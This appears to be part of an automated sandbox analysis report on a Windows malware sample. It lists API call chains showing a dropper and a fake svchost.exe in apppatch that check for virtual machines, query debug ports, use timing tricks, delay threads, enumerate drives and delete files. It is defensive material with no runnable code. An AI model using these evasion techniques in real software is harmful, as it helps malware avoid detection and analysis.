Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_014F3CE0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_014F3F50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_014E5720
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_014D7FD0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_014D1660
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_014D3610
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_014ECE10
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_014F1690
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date2_2_00403A20
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLLJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLLJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification,2_2_02BC78A0
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 3704Jump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 5561Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02BC79D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006A79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_006A79D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014E79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_014E79D0
Source: C:\Windows\apppatch\svchost.exe TID: 1268Thread sleep count: 3704 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 1268Thread sleep time: -370400s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7860Thread sleep count: 70 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3884Thread sleep count: 52 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 1268Thread sleep count: 5561 > 30Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 1268Thread sleep time: -556100s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3916Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,2_2_02BDDAE8
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,2_2_02BDDA50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCD120
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02BD9910
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,2_2_02BCE6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB7680 GetProcessHeap,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02BB7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006AD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AD120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006B9910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_006B9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006BDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_006BDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006BDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_006BDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006AE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_006AE6B0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00697680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_00697680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014F9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_014F9910
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014ED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014ED120
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014FDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_014FDA50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014FDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_014FDAE8
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D7680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_014D7680
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_014EE6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02BDE0FB
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: svchost.exe, 00000002.00000002.2582821552.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sApps\vmhgfs.DLLll
Source: svchost.exe, 00000002.00000002.2583250453.0000000000812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pindows\SYSTEM32\vmhgfs.DLL
Source: svchost.exe, 00000002.00000002.2586584940.0000000000892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD RfComm [Bluetooth]Hyper-V RAW@
Source: svchost.exe, 00000002.00000002.2589120507.0000000002903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.2587567847.00000000008EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006A79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_006A79D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification,2_2_02BC78A0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]2_2_00406800
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]2_2_00406B60
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A01360 mov eax, dword ptr fs:[00000030h]2_2_02A01360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A01360 mov edx, dword ptr fs:[00000030h]2_2_02A01360
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A01000 mov eax, dword ptr fs:[00000030h]2_2_02A01000
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00631360 mov eax, dword ptr fs:[00000030h]5_2_00631360
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00631360 mov edx, dword ptr fs:[00000030h]5_2_00631360
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00631000 mov eax, dword ptr fs:[00000030h]5_2_00631000
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01471360 mov eax, dword ptr fs:[00000030h]6_2_01471360
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01471360 mov edx, dword ptr fs:[00000030h]6_2_01471360
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01471000 mov eax, dword ptr fs:[00000030h]6_2_01471000
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,FindCloseChangeNotification,IsBadWritePtr,0_2_00401150
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720
